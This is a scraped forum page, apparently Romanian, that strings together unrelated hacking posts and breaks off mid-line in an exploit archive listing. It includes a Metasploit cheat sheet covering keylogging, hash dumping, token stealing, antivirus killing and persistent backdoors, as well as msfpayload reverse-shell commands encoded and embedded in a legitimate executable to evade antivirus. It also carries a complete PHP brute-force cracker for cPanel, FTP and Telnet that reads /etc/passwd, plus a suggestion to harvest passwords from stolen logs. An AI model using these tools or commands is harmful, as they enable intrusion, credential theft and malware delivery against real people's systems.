Fi8sVrs

ar trebui extrase passurile din logurile care le aveti si facut un dictionar cu cele mai frecvent folosite parole

Meterpreter Process: getuid hows user id getpid shows meterpreter process id ps ists running processes migrate [ps] migrates to given process (one that wont end/crash) KeyLog: Ensure you are monitoring the correct session (Explorer.exe/WinLogin.exe) idletime shows how long machine has been idle for keyscan_start starts the key logger keyscan_dump outputs captured data keyscan_stop stops the keylogger Channels: This allows you to do more than one thing at a time in meterpreter execute -f cmd.exe -c opens a new cmd.exe and creates a new channel for it channel -l lists the open channels read [channel] outputs data from channel interact [channel] allows you to jump into the channel write [channel] sends data to the channel close [channel] kills the channel Session: Session0 is the local desktop. Session1+ are rdp sessions. enumdesktops shows currently open desktops such as winlogin etc getdesktop shows current desktop session meterpreter is in setdesktop changes to an already open desktop session uictl disable keyboard disables the keyboard of the desktop session FileEdit: Ability to edit files atributes such as MACE timestomp file.txt -c "30/12/1980 12:12:34" changes file stamp of file timestomp file.txt -f sourcefile.txt copys timestamp from sourcefile.txt use priv to load the priv extras hashdump to dump the SAM file Tokens: Incognito allows token stealing and other token functions use incognito loads the incognito into meterpreter list_tokens -u shows stealable tokens impersonate_token allows a token to be stolen steal_token [psid] allows ability to steal token of a process rev2self reverts to origional token run post/windows/gather/cachedump gets cached domain hashes need to wget http://lab.mediaservice.net/code/cachedump.rb to framework3/modules/post/windows/gather Sniffer: Allows promiscuos mode to be enabled use sniffer loads the sniffer functions sniffer_interfaces list interface 1,2,3,4,5,6,etc sniffer_start [n] starts the sniffer for the interface sniffer_stats [n] lists packets, time, etc.. sniffer_dump [n] file.pcap dumps the capture locally sniffer_stop you guessed it Meterpreter Scripts: These scripts perform various functions on the victim run checkvm checks if the target is a vm run credscollect dumps hashes and tokens to screen run enum_firefox dumps temp internet files from firefox – cookies, passwords, etc run get_application_list shows installed applications run killav trys to stop all known AV progs run get_local_subnets enumerates local subnet info run metsvc creates a backdoor run persistence survices a reboot (without admin or system) run schedulme -e file.exe -m 30 you‘ll need to man load the meterpreter.exe payload run kitrap0d allows priv escalation using CVE-2010-0232 web browser exploit use auxilary/server/browser_autopwn set LHOST [local_ip] set SRVPORT 80 set URIPATH / run #now get the client to connect to you (use ettercap dns) inbuilt sqlite db db_driver sqlite3 starts the db using sqlite (file based) db_connect job creates a new db called job and connects to it db_hosts shows hosts db_services shows visible services db_nmap -sS [target_ip] performs nmap against target and stores in db dn_import_nmap_xml allows inport db_autopwn -p -e -r -t autoown from db vulns Meterpreter Payload Backdoor ./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 X > clear.exe ./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o encoded.exe sets the payload as meterpreter and then encodes it 5 times to bypass AV ./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -t exe -x /mnt/hgfs/tools/exploits/spider.exe -k -o /share/spider.exe -e x86/shikata_ga_nai -c 5 #this fucker bypasses sophos ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=4444 E One Liners # One liner meterpreter reverse_tcp /pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep ‘inet addr:’| grep -v ’127.0.0.1? | cut -d: -f2 | awk ‘{ print $1}’` LPORT=4444 X > /root/clear.exe # One liner shikata encoded meterpreter reverse_tcp /pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep ‘inet addr:’| grep -v ’127.0.0.1? | cut -d: -f2 | awk ‘{ print $1}’` LPORT=4444 R | /pentest/exploits/framework3/msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /root/encoded.exe # One liner encoded and hidden in windows exe meterpreter reverse_tcp /pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep ‘inet addr:’| grep -v ’127.0.0.1? | cut -d: -f2 | awk ‘{ print $1}’` LPORT=4444 R |/pentest/exploits/framework3/msfencode -t exe -x /mnt/hgfs/tools/exploits/spider.exe -k -o /root/spider.exe -e x86/shikata_ga_nai -c 5 Metasploit Notes | phillips321.co.uk

So I’ve been using my bt5-nmap.sh script for a few years to quickly gather data whilst on a pentest. The main issue with the way this script worked was it was not easy to continue a session half way through or to modify the number of running threads. This new script uses dialog which comes as standard in bt5. Options: arpscan “run arp-scan to create targets.txt” nmap “nmap targets” amap “amap ports found using nmap” sslscan “sslscan targets” gwp “Take photo of web pages found?” snmpscans “Check for default SNMP community strings” snmpget “Get data from SNMP services using known strings” enum4linux “Run enum4linux against targets” smtp “connect to SMTP to check if they allow relaying of mail” uniscan “run uniscan against HTTP(s) ports” nfsscan “connect to nfs services and list contents” You can checkout the code using the following svn command: svn checkout phillips321 - Revision 24: /trunk phillips321 or view the code on the googlecode page. Here are a few photo’s followed by a quick demo video… https://www.phillips321.co.uk/pentest-sh/

Anubis Comodo GFI sandbox jsunpack Norman ThreatExpert Wepawet

If you need to extract all the links / URLs from a Google search you can use the following commands: wget -q -U "Mozilla/5.001" -O - "http://www.google.com/search?q=inurl%3Aaftershell.com&num=100&start=200" | \ grep -o '<a href="http[^"]*"'|grep -v 'search?q=cache:'|grep -v '\.google\.'|sed 's/<a href="//;s/"$//' You can modify them to save the output or change the parameters for the languages (&hl= and &lr= ) and many more... AfterShell.com

<?php $cpanel_port="2082"; $connect_timeout=5; set_time_limit(0); $submit=$_REQUEST['submit']; $users=$_REQUEST['users']; $pass=$_REQUEST['passwords']; $target=$_REQUEST['target']; $cracktype=$_REQUEST['cracktype']; if($target == ""){ $target = "localhost"; } ?> <html> <head> <meta http-equiv="Content-Language" content="en-us"> </head> <title>Cpanel , FTP CraCkeR</title> <body text="#00FF00" bgcolor="#000000" vlink="#008000" link="#008000" alink="#008000"> <div align="center"> <form method="POST" style="border: 1px solid #000000"> <img border="0" src="http://www.alm3refh.com/upload/group/groupxp.gif" width="426" height="169"><table border="1" width="67%" bordercolorlight="#008000" bordercolordark="#003700"> <tr> <td> <p align="center"><b><font color="#008000" face="Tahoma" size="2"> <span lang="en-us">IP server</span> :</font><font face="Arial"> </font><font face="Arial" color="#CC0000"> <input type="text" name="target" size="16" value="<?php echo $target ?>" style="border: 2px solid #1D1D1D; background-color: #000000; color:#008000; font-family:Verdana; font-weight:bold; font-size:13px"></font></b></p> <p align="center"><b><font color="#008000" face="Tahoma" size="2"> </font></b></p> <div align="center"> <table border="1" width="57%" bordercolorlight="#008000" bordercolordark="#003700"> <tr> <td align="center"> <span lang="en-us"><font color="#FF0000"><b>User List</b></font></span></td> <td> <p align="center"> <span lang="en-us"><font color="#FF0000"><b>Password List</b></font></span></td> </tr> </table> <p align="center"> <textarea rows="20" name="users" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $users ?> </textarea><textarea rows="20" name="passwords" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $pass ?></textarea><br> <br> <font style="font-weight:700" size="2" face="Tahoma" color="#008000"> <span lang="ar-sa">Guess options</span></font><font style="font-size: 12pt;" size="-3" face="Verdana"><span style="font-size: 9pt;"> <font face="Tahoma"> <input name="cracktype" value="cpanel" style="font-weight: 700;" checked type="radio"></font></span></font><b><font size="2" face="Tahoma"> Cpanel</font><font size="2" color="#cc0000" face="Tahoma"> </font><font size="2" color="#FFFFFF" face="Tahoma"> (2082)</font></b><font size="2" face="Tahoma"><b> </b> </font> <font style="font-size: 12pt;" size="-3" face="Verdana"> <span style="font-size: 9pt;"><font face="Tahoma"> <input name="cracktype" value="cpanel2" style="font-weight: 700;" type="radio"></font></span></font><b><font size="2" face="Tahoma"> Telnet</font><font size="2" color="#cc0000" face="Tahoma"> </font><font size="2" color="#FFFFFF" face="Tahoma"> (23)</font></b><font size="2" face="Tahoma"><b> </b> </font> <font style="font-size: 12pt;" size="-3" face="Verdana"> <span style="font-size: 9pt;"><font face="Tahoma"> <input name="cracktype" value="ftp" style="font-weight: 700;" type="radio"></font></span></font><font style="font-weight: 700;" size="2" face="Tahoma"> </font><span style="font-weight: 700;"> <font size="2" face="Tahoma">Ftp </font> <font size="2" color="#FFFFFF" face="Tahoma"> (21)</font></span> <br> <font style="font-weight:700" size="2" face="Tahoma" color="#008000"><span lang="ar-sa">Timeout delay</span> <input type="text" name="connect_timeout" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $connect_timeout;?>"></input> </p> <p align="center"> <input type="submit" value="Go" name="submit" style="color: #008000; font-weight: bold; border: 1px solid #333333; background-color: #000000"></p> </td> </tr> </table> <p align="center"></td> </tr> </form> <?php function ftp_check($host,$user,$pass,$timeout) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "ftp://$host"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_FTPLISTONLY, 1); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print "<b><font face=\"Verdana\" style=\"font-size: 9pt\"> <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout Please Check The Target Hostname .</font></font></b></p>";exit; } else if ( curl_errno($ch) == 0 ) { print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Tahoma\" style=\"font-size: 9pt\"><b><font color=\"#008000\"> Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\" and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>"; } curl_close($ch); } function cpanel_check($host,$user,$pass,$timeout) { global $cpanel_port; $ch = curl_init(); //echo "http://$host:".$cpanel_port."<br>"; curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print "<b><font face=\"Verdana\" style=\"font-size: 9pt\"> <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout Please Check The Target Hostname .</font></font></b></p>";exit;} else if ( curl_errno($ch) == 0 ){ print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Tahoma\" style=\"font-size: 9pt\"><b><font color=\"#008000\"> Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\" and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>"; } curl_close($ch); } if(isset($submit) && !empty($submit)) { if(empty($users) && empty($pass)) { print "<p><font face=\"Tahoma\" size=\"2\"><b><font color=\"#FF0000\">Error : </font>Please Check The Users or Password List Entry . . .</b></font></p>"; exit; } if(empty($users)){ print "<p><font face='Tahoma' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Users List Entry . . .</b></font></p>"; exit; } if(empty($pass) ){ print "<p><font face='Tahoma' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Password List Entry . . .</b></font></p>"; exit; }; $userlist=explode("\n",$users); $passlist=explode("\n",$pass); print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#FF0000\"> Cracking Process Started, Please Wait ...</font></b><br><br>"; if(isset($_POST['connect_timeout'])) { $connect_timeout=$_POST['connect_timeout']; } if($cracktype == "ftp") { foreach ($userlist as $user) { $pureuser = trim($user); foreach ($passlist as $password ) { $purepass = trim($password); ftp_check($target,$pureuser,$purepass,$connect_tim eout); } } } if ($cracktype == "cpanel" || $cracktype == "cpanel2") { if($cracktype == "cpanel2") { $cpanel_port="23"; } else $cpanel_port="2082"; foreach ($userlist as $user) { $pureuser = trim($user); print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#FF0800\"> Processing user $pureuser ...</font></b><br><br>"; foreach ($passlist as $password ) { $purepass = trim($password); cpanel_check($target,$pureuser,$purepass,$connect_ timeout); } } } } ?> <p align="center"><b><a href="http://www.alm3refh.com/vb"> <span style="text-decoration: none">Sunni</span></a></b></p> <form style="border: 0px ridge #FFFFFF"> <p align="center"></td> </tr><div align="center"> <tr> <input type="submit" name="user" value="user"><option value="name"></select> </form> <div align="center"> <table border="1" width="10%" bordercolorlight="#008000" bordercolordark="#006A00" height="100" cellspacing="1"> <tr> <td bordercolorlight="#008000" bordercolordark="#006A00"> <p align="left"> <textarea style="border: 2px solid #1D1D1D;background: #200000;color:#CCFFFF" method='POST' rows="25" name="S1" cols="22"> <?php if (isset($_GET['user'])) system('ls /var/mail'); if (isset($_POST['grab_users1'])) //grab users from /etc/passwd { $lines=file("/etc/passwd"); foreach($lines as $nr=>$val) { $str=explode(":",$val); echo $str[0]."\n"; } } if (isset($_POST['grab_users2'])) { $dir = "/home/"; if ($dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { echo $file. "\n"; } closedir($dh); } } for($uid=0;$uid<90000;$uid++) { } ?></textarea> <table> <tr> <form action="" method="POST"> <input type="hidden" value="true" name="grab_users1"></input> <input type=submit value="Grab Usernames from /etc/passwd"></input> </form> </tr> <br> <tr> <form action="" method="POST"> <input type="hidden" value="true" name="grab_users2"></input> <input type=submit value="Grab Usernames from /home/"></input> </form> </tr> <br> <tr> <form action="" method="POST"> <input type="hidden" value="true" name="grab_users3"></input> <input type=submit value="Grab Usernames from /home/ II"></input> </form> </tr> </form> </table> <?php if (isset($_POST['grab_users3'])) { error_reporting(0); $dir = "/home/"; if ($dh = opendir($dir)) { $f = readdir($dh);$f = readdir($dh); while (($f = readdir($dh)) !== false) { //echo $f. "\n"; $f.="/"; $dh2=opendir($dir.$f); $f2 = readdir($dh2);$f2 = readdir($dh2); while (($f2 = readdir($dh2)) !== false) { //echo $f2. "\n"; $f2.="/"; $dh3=opendir($dir.$f.$f2); $f3 = readdir($dh3);$f3 = readdir($dh3); while (($f3 = readdir($dh3)) !== false) { echo $f3. "<br>"; } } } closedir($dh); } } ?> source: r00tw0rm

SeciTc 5th International Conference on Security for Information Technology and Communications June 2012, Bucharest Romania Conference areas: Cryptographic Algorithms and Protocols Security Technologies for IT&C Information Security Management Conference papers: will be published in a the printed volume of the Conference Proceedings Selected papers from the conference will be considered for publication in the supporting journals. Journal of Mobile, Embedded and Distributed Systems Journal of Applied Quantitative Methods Printed volume with ISBN 5th International Conference on Security for Information Technology and Communications edit: a fost program

specifica sursa de unde l-ai luat

http://www.youtube.com/watch?v=3mch44il4QE Description: Fimap is a python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It's currently under heavy development but it's usable. from: securitytube.net

Online tool for creating .htaccess files: [en] .htaccess Editor root@KinG-InFeT ~ $_

This archive contains all of the 251 exploits added to Packet Storm in May, 2012. Directory: \1205-exploits Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 5/11/2012 5:44 AM 4826 9sg_photoshock.tgz -a--- 5/22/2012 4:37 AM 4420 activecollab_chat.rb.txt -a--- 5/20/2012 10:22 PM 2050 acuitycms-shell.txt -a--- 5/20/2012 8:22 PM 1215 acuitycms-traversal.txt -a--- 5/23/2012 5:52 AM 2251 ajamintgallery-lfi.txt -a--- 5/20/2012 8:22 PM 3803 ajaxmintgallery-xsrf.txt -a--- 5/2/2012 4:51 AM 2884 alsovalue-sql.txt -a--- 5/4/2012 1:46 AM 4996 anvsoft-overflow.txt -a--- 5/12/2012 8:22 PM 2796 anvsoftanyvideo-overflow.txt -a--- 5/24/2012 5:44 AM 3339 apprain_upload_exec.rb.txt -a--- 5/19/2012 7:33 AM 1182 attractwebcms-sql.txt -a--- 5/16/2012 1:42 AM 6296 axous-csrf.txt -a--- 5/27/2012 9:48 PM 13034 azdgdatingmedium-xssxsrfexec.txt -a--- 5/20/2012 6:22 PM 734 azphotoalbum-xss.txt -a--- 5/14/2012 11:22 PM 1669 b2epms-sql.txt -a--- 5/27/2012 9:56 PM 2081 b2epms10-sql.txt -a--- 5/8/2012 4:13 PM 5116 baglercms-sqlxss.txt -a--- 5/18/2012 5:58 PM 3590 batik_svg_java.rb.txt -a--- 5/18/2012 5:58 PM 5088 bea_weblogic_post_bof.rb.txt -a--- 5/24/2012 3:12 PM 881 bsnes-dos.txt -a--- 5/17/2012 2:14 AM 634 captchaunijimpe-xss.txt -a--- 5/11/2012 12:11 AM 17502 chevereto-dos.txt -a--- 5/10/2012 7:11 AM 4030 chevreto-xss.txt -a--- 5/20/2012 6:22 PM 4217 chiccosnoopyclub-sqlxss.txt -a--- 5/8/2012 8:17 PM 3377 ciscolinksys-xsrf.txt -a--- 5/20/2012 4:22 PM 802 cmsahmebaprofessional-shell.txt -a--- 5/19/2012 12:09 PM 259553 concrete5521-xssxsrf.txt -a--- 5/20/2012 6:22 PM 4830 concretecms-shelldos.txt -a--- 5/8/2012 6:15 PM 13205 CORE-2012-0123.txt -a--- 5/18/2012 5:22 AM 1330 cryptographp-hrslfi.txt -a--- 5/25/2012 11:26 PM 3306 CSA-12005.txt -a--- 5/9/2012 8:23 PM 2495 decisiontools-exec.txt -a--- 5/4/2012 7:23 AM 3836 designmodern-sqlxss.txt -a--- 5/12/2012 12:59 AM 3256 distinct_tftp_traversal.rb.txt -a--- 5/18/2012 12:20 AM 4352 division6it-sqlxss.txt -a--- 5/25/2012 11:29 PM 6285 dorncms-shell.rb.txt -a--- 5/20/2012 2:11 PM 921 doubletakedesign-sql.txt -a--- 5/20/2012 6:22 PM 1061 dvdlab-dos.txt -a--- 5/25/2012 10:11 PM 4705 dynpage-xsrfshell.txt -a--- 5/7/2012 10:57 PM 1689 efront-shellxss.txt -a--- 5/11/2012 5:38 AM 560 elearning4g-sqlrfi.txt -a--- 5/7/2012 10:55 PM 2988 enjoygraphcommunication-sql.txt -a--- 5/2/2012 4:33 AM 2952 estudioayllon-sql.txt -a--- 5/7/2012 10:53 PM 2898 etelligence-sql.txt -a--- 5/3/2012 12:17 AM 1113 exophpdesk121-sql.txt -a--- 5/17/2012 2:41 AM 1195 flashpeak-dos.txt -a--- 5/31/2012 3:03 AM 1468 fldl-navigate.txt -a--- 5/22/2012 4:40 AM 5083 flexnet_lmgrd_bof.rb.txt -a--- 5/4/2012 1:34 AM 2288 fortiweb-bypass.txt -a--- 5/22/2012 4:39 AM 3643 foxit_reader_launch.rb.txt -a--- 5/14/2012 3:12 PM 712 galette-sql.txt -a--- 5/31/2012 2:52 AM 5762 ganesha-sqlxss.txt -a--- 5/25/2012 11:57 PM 1165 gekkocms-disclose.txt -a--- 5/31/2012 3:21 AM 2699 gimp-overflow.tgz -a--- 5/9/2012 8:55 PM 748 guitarpro-dos.txt -a--- 5/2/2012 4:52 AM 1345 heycats-xss.txt -a--- 5/18/2012 5:20 PM 2313 hpvsa-exec.txt -a--- 5/22/2012 4:38 AM 2755 hp_vsa_exec.rb.txt -a--- 5/31/2012 2:50 AM 3692 ibaguenet-sql.txt -a--- 5/3/2012 12:18 AM 1344 iguard-xss.txt -a--- 5/14/2012 2:23 AM 50164 imgrd_1.tgz -a--- 5/2/2012 7:00 AM 266 index.html -a--- 5/12/2012 2:11 PM 808 indexa-sql.txt -a--- 5/4/2012 2:03 AM 3214 ineat-sql.txt -a--- 5/27/2012 1:22 AM 2124 ios5_safari_js_crash.rb.txt -a--- 5/29/2012 2:19 AM 2143 ispvm_xcf_ispxcf.rb.txt -a--- 5/24/2012 5:47 PM 1472 jaow-sql.txt -a--- 5/7/2012 10:59 PM 2763 jibberbook-bypass.txt -a--- 5/11/2012 5:39 AM 1195 kerio-disclose.txt -a--- 5/6/2012 5:20 AM 1318 kerwebkerwin-xss.txt -a--- 5/9/2012 10:22 PM 1339 KORAMIS-ADV2012-001.txt -a--- 5/29/2012 2:04 AM 71737 libreoffice-dos.txt -a--- 5/16/2012 1:06 AM 44140 liferay-bypass.tgz -a--- 5/16/2012 1:16 AM 5314 liferay-disclose.tgz -a--- 5/14/2012 6:44 PM 941 liferay-escalate.txt -a--- 5/16/2012 1:35 AM 1516 liferay-xsrf.tgz -a--- 5/16/2012 1:10 AM 1787 liferay6-xss.txt -a--- 5/4/2012 1:40 AM 3276 lynx-sqlxss.txt -a--- 5/4/2012 1:45 AM 2923 mcafee_mvt_exec.rb.txt -a--- 5/7/2012 10:52 PM 4051 mdg-sqlxsrf.txt -a--- 5/2/2012 4:25 AM 13011 mikrotik-dos.txt -a--- 5/3/2012 12:35 AM 1332 mountaininternet-xss.txt -a--- 5/14/2012 8:37 AM 13908 mozilla_attribchildremoved.rb.txt -a--- 5/9/2012 1:22 AM 11395 mozilla_nssvgvalue.rb.txt -a--- 5/30/2012 2:26 AM 2856 mplayer_sami_bof.rb.txt -a--- 5/16/2012 1:01 AM 1125 multimediabuilder-dos.txt -a--- 5/2/2012 4:18 AM 1296 mychiptime-xss.txt -a--- 5/12/2012 1:11 PM 1553 nec-backdoor.txt -a--- 5/31/2012 2:49 AM 2783 newsadd-sql.txt -a--- 5/7/2012 11:00 PM 671 nexusinfotech-sql.txt -a--- 5/2/2012 5:07 AM 1982 NGS00117-1.txt -a--- 5/2/2012 5:11 AM 1709 NGS00118-1.txt -a--- 5/2/2012 4:05 AM 4086 NGS00137-1.txt -a--- 5/2/2012 4:07 AM 3437 NGS00138-1.txt -a--- 5/2/2012 4:28 AM 5677 NGS00140-1.txt -a--- 5/2/2012 5:00 AM 3758 NGS00141-1.txt -a--- 5/20/2012 2:11 PM 3560 nogod-sql.txt -a--- 5/23/2012 5:49 AM 7086 novell491-escalate.txt -a--- 5/15/2012 2:28 AM 3840 ntds-sql.txt -a--- 5/2/2012 6:54 PM 4518 openconf-sql.txt -a--- 5/23/2012 5:22 PM 1436 openid-session.txt -a--- 5/24/2012 5:44 AM 2490 openoffice_ole.rb.txt -a--- 5/11/2012 6:34 PM 677 owncloud-ldap-backend.txt -a--- 5/29/2012 2:08 AM 1377 pbboard-lfi.txt -a--- 5/30/2012 2:29 AM 6996 pbboard-mcsrf-fu-cexe.rb.txt -a--- 5/29/2012 6:28 PM 2765 pbboard-sql.txt -a--- 5/21/2012 2:10 PM 949 phalbumpgs-xss.txt -a--- 5/18/2012 5:21 PM 5481 php54-exec.txt -a--- 5/20/2012 10:22 PM 1544 php543-null.txt -a--- 5/21/2012 2:11 PM 1956 php543sink-dos.txt -a--- 5/22/2012 2:11 PM 11877 phpcgi-exploit.txt -a--- 5/6/2012 5:16 AM 1328 phpcgi-inject.txt -a--- 5/23/2012 6:22 PM 1202 phpcollab-bypass.txt -a--- 5/23/2012 5:29 AM 1500 phpcollab-disclose.txt -a--- 5/23/2012 3:12 PM 2045 phpcollab-upload.txt -a--- 5/8/2012 4:13 PM 2520 phpenter-exec.txt -a--- 5/26/2012 6:07 PM 2360 phplist-inject.txt -a--- 5/2/2012 4:19 AM 462 phppastebin-xss.txt -a--- 5/29/2012 2:01 AM 1625 phpvolunteerms-shellxss.txt -a--- 5/29/2012 1:59 AM 1089 phpvolunteerms-sql.txt -a--- 5/6/2012 4:32 AM 3802 php_cgi_arg_injection.rb.txt -a--- 5/31/2012 3:12 AM 7730 php_volunteer_upload_exec.rb.txt -a--- 5/25/2012 11:24 PM 5666 pligg121-lfixss.txt -a--- 5/21/2012 5:22 PM 590 ploggerpg-sql.txt -a--- 5/3/2012 12:33 AM 2457 pluxml-lfi.txt -a--- 5/25/2012 11:19 PM 2919 pragmamx1121-xss.txt -a--- 5/13/2012 10:22 PM 13470 proservrex_1.tgz -a--- 5/2/2012 12:27 AM 1577 pvmgm-sql.txt -a--- 5/11/2012 6:23 PM 49362 qnx-overflows.tgz -a--- 5/27/2012 10:06 PM 4634 quickshare_traversal_write.rb.txt -a--- 5/25/2012 11:56 PM 2264 rabidhamster_r4_log.rb.txt -a--- 5/7/2012 10:56 PM 865 ramuiforum-xss.txt -a--- 5/20/2012 9:22 PM 1396 realdraw-dos.txt -a--- 5/25/2012 11:36 PM 1910 resedit-overflow.tgz -a--- 5/18/2012 6:22 PM 925 resultsunlimitedcms-sql.txt -a--- 5/3/2012 12:22 AM 4656 rt-sa-2012-002.txt -a--- 5/23/2012 5:50 AM 17923 ruubik111-xssdisclosetraversal.txt -a--- 5/15/2012 5:39 AM 669 sabre-xss.txt -a--- 5/2/2012 4:15 AM 4356 samsung-activex.txt -a--- 5/27/2012 9:50 PM 171799 santilga-sqlxsrf.txt -a--- 5/18/2012 5:18 PM 3136 skincrafter-overflow.txt -a--- 5/26/2012 6:06 PM 1038 smallcms-inject.txt -a--- 5/31/2012 3:08 AM 1145 snapdeal-xssredir.txt -a--- 5/24/2012 6:27 PM 4358 socialengine-xssxsrf.txt -a--- 5/12/2012 6:21 PM 1688 sockso-xss.txt -a--- 5/2/2012 4:24 AM 3648 solarwindsstoragemanager-sql.txt -a--- 5/6/2012 4:33 AM 6837 solarwinds_storage_manager_sql.rb.txt -a--- 5/13/2012 4:33 PM 3176 SOS-12-005.txt -a--- 5/2/2012 4:22 AM 325 strato-traversal.txt -a--- 5/31/2012 3:11 AM 4648 styledesign-sql.txt -a--- 5/14/2012 1:22 AM 11629 suitelink_1.tgz -a--- 5/23/2012 5:44 AM 6587 supernews261-sql.txt -a--- 5/16/2012 1:21 AM 2286 svg-trigger.tgz -a--- 5/23/2012 4:33 PM 2171 symantecendpoint-exec.txt -a--- 5/26/2012 6:04 PM 957 symantecwg-lfi.txt -a--- 5/6/2012 5:08 AM 974 symantecwg-xss.txt -a--- 5/29/2012 2:19 AM 2762 symantec_web_gateway_lfi.rb.txt -a--- 5/23/2012 5:27 AM 2344 tftpd32-dos.txt -a--- 5/29/2012 1:54 AM 2422 tftpd32dns-dos.txt -a--- 5/15/2012 2:23 AM 1532 tftp_server_v14ST.rb.txt -a--- 5/29/2012 2:07 AM 2566 topicsviewer-lfisql.txt -a--- 5/6/2012 5:22 AM 728 trombinoscope-sql.txt -a--- 5/16/2012 1:08 AM 3774 tuninfo-sql.txt -a--- 5/14/2012 8:23 PM 1124 universalreader-dos.txt -a--- 5/14/2012 8:23 PM 3758 vallarta-sql.txt -a--- 5/30/2012 2:33 AM 4019 vamcart-shellxsrf.txt -a--- 5/30/2012 2:34 AM 8087 vamcart09_rce.rb.txt -a--- 5/19/2012 4:40 AM 784 vanillaaboutme-xss.txt -a--- 5/19/2012 9:22 PM 708 vanillafln-xss.txt -a--- 5/19/2012 4:41 AM 610 vanillalc-xss.txt -a--- 5/2/2012 4:40 AM 1392 vbulletin4112-xss.txt -a--- 5/2/2012 4:14 AM 695 veissweb-sql.txt -a--- 5/19/2012 3:12 PM 2957 vertrigoserv-escalate.txt -a--- 5/2/2012 4:42 AM 3641 VL-321.txt -a--- 5/2/2012 4:35 AM 12925 VL-511.txt -a--- 5/13/2012 9:00 AM 5015 VL-512.txt -a--- 5/13/2012 1:22 AM 7127 VL-513.txt -a--- 5/6/2012 4:42 AM 5706 VL-516.txt -a--- 5/4/2012 5:56 PM 7405 VL-517.txt -a--- 5/12/2012 5:22 PM 5834 VL-519.txt -a--- 5/12/2012 3:12 PM 6491 VL-521.txt -a--- 5/4/2012 5:58 PM 9450 VL-524.txt -a--- 5/13/2012 8:56 AM 9404 VL-525.txt -a--- 5/13/2012 9:02 AM 7680 VL-530.txt -a--- 5/12/2012 4:13 PM 5603 VL-535.txt -a--- 5/4/2012 6:00 PM 10643 VL-536.txt -a--- 5/2/2012 4:48 AM 13642 VL-537.txt -a--- 5/2/2012 4:20 AM 4290 VL-538.txt -a--- 5/13/2012 9:04 AM 4361 VL-560.txt -a--- 5/4/2012 1:45 AM 5982 vlc_mms_bof.rb.txt -a--- 5/6/2012 4:39 AM 8324 vmware-backdoor.txt -a--- 5/4/2012 1:43 AM 3285 waraxe-2012-SA087.txt -a--- 5/4/2012 2:11 AM 3109 waraxe-2012-SA088.txt -a--- 5/25/2012 11:56 PM 3953 webid_converter.rb.txt -a--- 5/6/2012 5:23 AM 3047 webrelations-sql.txt -a--- 5/28/2012 9:22 PM 2119 whmcs-sql.tgz -a--- 5/31/2012 2:47 AM 2541 whmcs-xssxsrf.txt -a--- 5/27/2012 9:51 PM 4011 whyweb-sql.txt -a--- 5/12/2012 12:58 AM 6565 wikka_spam_exec.rb.txt -a--- 5/3/2012 12:06 AM 1829 win32k-dos.txt -a--- 5/2/2012 4:46 AM 748 windsonline-sql.txt -a--- 5/29/2012 1:55 AM 1516 winradius-dos.txt -a--- 5/23/2012 5:45 AM 15808 winxpkeyboard.zip -a--- 5/24/2012 6:15 PM 1816 wiresharkdiameter-dos.tgz -a--- 5/24/2012 6:12 PM 3289 wiresharkdis-dos.tgz -a--- 5/24/2012 5:53 PM 536 wiresharkmisalign-dos.tgz -a--- 5/31/2012 2:51 AM 3750 wmsvaio-overflow.txt -a--- 5/6/2012 4:46 AM 1010 wordpress322-xss.txt -a--- 5/11/2012 5:26 AM 6023 wp2click-xss.txt -a--- 5/15/2012 6:09 AM 881 wp2clicksocialmedia-xss.txt -a--- 5/11/2012 5:34 AM 